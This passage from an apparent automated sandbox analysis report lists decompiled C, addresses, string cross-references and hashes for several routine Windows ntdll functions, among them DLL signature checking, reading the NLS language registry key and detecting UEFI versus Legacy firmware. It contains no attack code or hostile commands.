                            • Opcode Fuzzy Hash: 937b071af635bd5b209cb977920bb2af94b9c4a2acb17aadfb590c7e400e9639
                            • Instruction Fuzzy Hash: 9891E271A2021A9BEF18DF59D481ABAFBB9FF44318F15417DDB01AB251D730AD01CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 012F7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                            Download Yara Rule
                            C-Code - Quality: 98%
                            			E012F7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E012FCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E012EC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x13d5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01365510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x13d5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01307D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01307D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01367016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01307D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01307D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01367016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0131A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E012EB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                            0x012f7e4c
                            0x012f7e50
                            0x012f7e55
                            0x012f7e58
                            0x012f7e5d
                            0x012f7e71
                            0x012f7f33
                            0x012f7e77
                            0x012f7e77
                            0x012f7e79
                            0x012f7e79
                            0x012f7e7e
                            0x012f7f45
                            0x01349848
                            0x00000000
                            0x01349848
                            0x012f7f4e
                            0x012f7f53
                            0x012f7f5a
                            0x00000000
                            0x00000000
                            0x0134985a
                            0x01349862
                            0x01349866
                            0x00000000
                            0x0134986c
                            0x00000000
                            0x0134986c
                            0x012f7e84
                            0x012f7e84
                            0x012f7e8d
                            0x01349871
                            0x012f7eb8
                            0x012f7ec0
                            0x012f7ec0
                            0x012f7e9a
                            0x0134987e
                            0x00000000
                            0x00000000
                            0x01349884
                            0x0134988b
                            0x013498a7
                            0x013498ac
                            0x013498b1
                            0x013498b6
                            0x013498b8
                            0x013498b8
                            0x013498b9
                            0x00000000
                            0x013498b9
                            0x012f7ea0
                            0x012f7ea7
                            0x00000000
                            0x00000000
                            0x012f7eac
                            0x012f7eb1
                            0x012f7ec6
                            0x012f7ed0
                            0x013498cc
                            0x012f7ed6
                            0x012f7ed6
                            0x012f7ed6
                            0x012f7ede
                            0x012f7ee3
                            0x013498e3
                            0x013498f0
                            0x01349902
                            0x013498f2
                            0x013498fb
                            0x013498fb
                            0x01349907
                            0x0134991d
                            0x0134991d
                            0x01349907
                            0x013498e3
                            0x012f7ef0
                            0x012f7f14
                            0x012f7f14
                            0x012f7f1e
                            0x01349946
                            0x012f7f24
                            0x012f7f24
                            0x012f7f24
                            0x012f7f2c
                            0x0134996a
                            0x01349975
                            0x01349975
                            0x0134997e
                            0x01349993
                            0x01349993
                            0x0134997e
                            0x00000000
                            0x012f7ef2
                            0x012f7efc
                            0x012f7f0a
                            0x012f7f0e
                            0x01349933
                            0x00000000
                            0x01349933
                            0x00000000
                            0x012f7f0e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x012f7eb1

                            Strings
                            • Could not validate the crypto signature for DLL %wZ, xrefs: 01349891
                            • LdrpCompleteMapModule, xrefs: 01349898
                            • minkernel\ntdll\ldrmap.c, xrefs: 013498A2
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                            • API String ID: 0-1676968949
                            • Opcode ID: fd7a041af300553b9a6e335d8199e4bd01761de75383a0b48ae353f0b0ad05f6
                            • Instruction ID: eb8ab0907ad23cddd67c48c2a2e0016aeb8dab7824e73a1e1cb89c43783ffc11
                            • Opcode Fuzzy Hash: fd7a041af300553b9a6e335d8199e4bd01761de75383a0b48ae353f0b0ad05f6
                            • Instruction Fuzzy Hash: D251BF356207469BEB22CF6CC944B2ABBE4AB04718F1406AEEB519B7D2D774E900C791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 012EE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                            Download Yara Rule
                            C-Code - Quality: 93%
                            			E012EE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E012EF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E013295D0();
						}
						if(_t78 != 0) {
							L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0132FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0132BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01329600();
					if(_t97 < 0) {
						goto L6;
					}
					E0132BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L012EF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0132BB40(_t83, _t102 + 0x24, _t78);
								if(L012F43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0132BB40(_t84, _t102 + 0x24, _t94);
									if(L012F43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                            0x012ee620
                            0x012ee628
                            0x012ee62f
                            0x012ee631
                            0x012ee635
                            0x012ee637
                            0x012ee63e
                            0x01345503
                            0x01345503
                            0x012ee64c
                            0x012ee64c
                            0x012ee651
                            0x00000000
                            0x00000000
                            0x012ee661
                            0x012ee665
                            0x0134542a
                            0x012ee715
                            0x012ee71a
                            0x012ee71c
                            0x012ee720
                            0x012ee720
                            0x012ee727
                            0x012ee736
                            0x012ee736
                            0x012ee743
                            0x012ee743
                            0x012ee673
                            0x012ee678
                            0x012ee67d
                            0x012ee682
                            0x012ee685
                            0x012ee692
                            0x012ee69b
                            0x012ee6a3
                            0x012ee6ad
                            0x012ee6b1
                            0x012ee6b2
                            0x012ee6bb
                            0x012ee6bf
                            0x012ee6c0
                            0x012ee6c8
                            0x012ee6cc
                            0x012ee6d5
                            0x012ee6d9
                            0x00000000
                            0x00000000
                            0x012ee6e5
                            0x012ee6ea
                            0x012ee6f9
                            0x012ee70b
                            0x012ee70f
                            0x01345439
                            0x0134545e
                            0x0134545e
                            0x00000000
                            0x0134545e
                            0x0134543b
                            0x0134543e
                            0x01345440
                            0x01345445
                            0x01345472
                            0x01345475
                            0x0134548d
                            0x01345493
                            0x013454a9
                            0x00000000
                            0x00000000
                            0x013454ab
                            0x013454b4
                            0x013454bc
                            0x013454c8
                            0x013454de
                            0x013454fb
                            0x013454e0
                            0x013454e6
                            0x013454eb
                            0x013454eb
                            0x013454de
                            0x00000000
                            0x013454bc
                            0x01345477
                            0x0134547a
                            0x01345480
                            0x01345483
                            0x01345486
                            0x0134548b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0134548b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01345447
                            0x01345447
                            0x01345447
                            0x01345447
                            0x0134544e
                            0x00000000
                            0x00000000
                            0x01345450
                            0x01345452
                            0x01345455
                            0x0134545a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0134545c
                            0x0134546a
                            0x0134546d
                            0x0134546f
                            0x00000000
                            0x0134546f
                            0x012ee70f

                            Strings
                            • InstallLanguageFallback, xrefs: 012EE6DB
                            • @, xrefs: 012EE6C0
                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 012EE68C
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                            • API String ID: 0-1757540487
                            • Opcode ID: 1281cfea396d6009dfcb4a743414078c88207cd7488e2f9f15260545202472d8
                            • Instruction ID: c1fa0448f6a865bdd82888884a61906c5e709a6a403da5d990df4fac3cf3ecb8
                            • Opcode Fuzzy Hash: 1281cfea396d6009dfcb4a743414078c88207cd7488e2f9f15260545202472d8
                            • Instruction Fuzzy Hash: 0151E6729143569BD714DF28C444A7BB7E8BF88618F45092EFA85E7240F734EA04C7A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013AE539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                            Download Yara Rule
                            C-Code - Quality: 60%
                            			E013AE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E013ABBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E013ABCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E013AAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01329730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E013AA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E013AA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01329730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E013AA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E013AA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01302280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E012FB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E012FFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01307D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0139FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                            0x013ae547
                            0x013ae549
                            0x013ae54f
                            0x013ae553
                            0x013ae557
                            0x013ae55a
                            0x013ae55c
                            0x013ae55f
                            0x013ae561
                            0x013ae567
                            0x013ae56b
                            0x013ae7e2
                            0x00000000
                            0x013ae571
                            0x013ae575
                            0x013ae577
                            0x013ae57b
                            0x013ae57c
                            0x013ae57d
                            0x013ae57e
                            0x013ae57f
                            0x013ae588
                            0x013ae58f
                            0x013ae591
                            0x013ae592
                            0x013ae592
                            0x013ae596
                            0x013ae59e
                            0x013ae5a0
                            0x013ae5a6
                            0x013ae61d
                            0x013ae61d
                            0x013ae621
                            0x013ae623
                            0x013ae630
                            0x013ae630
                            0x013ae7e6
                            0x013ae7eb
                            0x013ae7ed
                            0x013ae7f4
                            0x013ae7fa
                            0x013ae7ff
                            0x013ae7ff
                            0x013ae80a
                            0x013ae812
                            0x013ae812
                            0x013ae5ab
                            0x013ae5b4
                            0x013ae5b9
                            0x013ae5be
                            0x013ae5c0
                            0x013ae5c2
                            0x013ae5c8
                            0x013ae5c9
                            0x013ae5cb
                            0x013ae5cc
                            0x013ae5d5
                            0x013ae5e4
                            0x013ae5f1
                            0x013ae5f8
                            0x013ae5f8
                            0x013ae5d5
                            0x013ae602
                            0x013ae616
                            0x013ae63d
                            0x013ae644
                            0x013ae64d
                            0x013ae652
                            0x013ae657
                            0x013ae659
                            0x013ae65b
                            0x013ae661
                            0x013ae662
                            0x013ae664
                            0x013ae665
                            0x013ae66e
                            0x013ae67d
                            0x013ae68a
                            0x013ae691
                            0x013ae691
                            0x013ae66e
                            0x013ae6b0
                            0x00000000
                            0x013ae6b6
                            0x013ae6bd
                            0x013ae6c7
                            0x013ae6d7
                            0x013ae6d9
                            0x013ae6db
                            0x013ae6de
                            0x013ae6e3
                            0x013ae6f3
                            0x013ae6fc
                            0x013ae700
                            0x013ae700
                            0x013ae704
                            0x013ae70a
                            0x013ae70a
                            0x013ae713
                            0x013ae716
                            0x013ae719
                            0x013ae720
                            0x013ae761
                            0x013ae76b
                            0x013ae774
                            0x013ae77a
                            0x013ae77a
                            0x013ae78a
                            0x013ae791
                            0x013ae799
                            0x013ae79b
                            0x013ae79f
                            0x013ae7aa
                            0x013ae7c0
                            0x013ae7ac
                            0x013ae7b2
                            0x013ae7b9
                            0x013ae7b9
                            0x013ae7c7
                            0x013ae806
                            0x00000000
                            0x013ae7c9
                            0x013ae7d1
                            0x013ae7d8
                            0x00000000
                            0x013ae7d8
                            0x00000000
                            0x00000000
                            0x013ae722
                            0x013ae72e
                            0x013ae748
                            0x013ae74c
                            0x013ae754
                            0x013ae756
                            0x013ae75c
                            0x013ae75c
                            0x00000000
                            0x013ae75c
                            0x013ae758
                            0x013ae758
                            0x00000000
                            0x013ae758
                            0x013ae750
                            0x00000000
                            0x00000000
                            0x013ae752
                            0x00000000
                            0x013ae752
                            0x013ae730
                            0x013ae735
                            0x013ae73d
                            0x013ae73f
                            0x00000000
                            0x00000000
                            0x013ae741
                            0x013ae741
                            0x00000000
                            0x013ae741
                            0x013ae739
                            0x00000000
                            0x00000000
                            0x013ae73b
                            0x00000000
                            0x013ae73b
                            0x013ae722
                            0x013ae720
                            0x013ae6b0
                            0x013ae618
                            0x00000000
                            0x013ae618

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: `$`
                            • API String ID: 0-197956300
                            • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                            • Instruction ID: a5c7e1833bab32d4a881397fb26bc2898452e5743cfa6f654bb22f9e79d21632
                            • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                            • Instruction Fuzzy Hash: 58918F326043429FE724CE29C845B1BBBE9EF84728F54893DF6A5CB290E775E904CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013651BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                            Download Yara Rule
                            C-Code - Quality: 77%
                            			E013651BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x13c05f0);
				E0133D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E012FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E013653CA(0);
						return E0133D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0132F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01303690(1, _t117, 0x12c1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0132AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01304620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0132AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0136500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01329860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                            0x013651be
                            0x013651c3
                            0x013651c8
                            0x013651cd
                            0x013651d0
                            0x013651d3
                            0x013651d8
                            0x013651db
                            0x013651de
                            0x013651e0
                            0x013651e3
                            0x013651e6
                            0x013651e8
                            0x01365342
                            0x01365351
                            0x01365356
                            0x0136535a
                            0x01365360
                            0x01365363
                            0x01365366
                            0x01365369
                            0x01365369
                            0x0136536b
                            0x0136536b
                            0x01365370
                            0x013653a3
                            0x013653a4
                            0x013653a6
                            0x013653ab
                            0x013653ab
                            0x013653ae
                            0x013653ae
                            0x013653b5
                            0x013653bf
                            0x013653bf
                            0x01365375
                            0x01365396
                            0x013653a0
                            0x013653a0
                            0x00000000
                            0x01365396
                            0x01365377
                            0x01365379
                            0x0136537f
                            0x0136538c
                            0x01365390
                            0x00000000
                            0x01365390
                            0x013651ee
                            0x013651f1
                            0x01365301
                            0x01365310
                            0x01365315
                            0x01365318
                            0x0136531b
                            0x01365320
                            0x0136532e
                            0x01365331
                            0x00000000
                            0x01365331
                            0x01365328
                            0x01365329
                            0x00000000
                            0x01365329
                            0x013651fa
                            0x01365235
                            0x01365236
                            0x01365239
                            0x0136523f
                            0x01365240
                            0x01365241
                            0x01365242
                            0x01365246
                            0x01365247
                            0x0136524e
                            0x01365251
                            0x01365267
                            0x01365269
                            0x0136526e
                            0x0136527d
                            0x0136527e
                            0x01365281
                            0x01365282
                            0x01365287
                            0x01365288
                            0x0136528a
                            0x0136528f
                            0x01365294
                            0x00000000
                            0x00000000
                            0x0136529a
                            0x0136529c
                            0x0136529e
                            0x0136529e
                            0x013652a4
                            0x013652b0
                            0x00000000
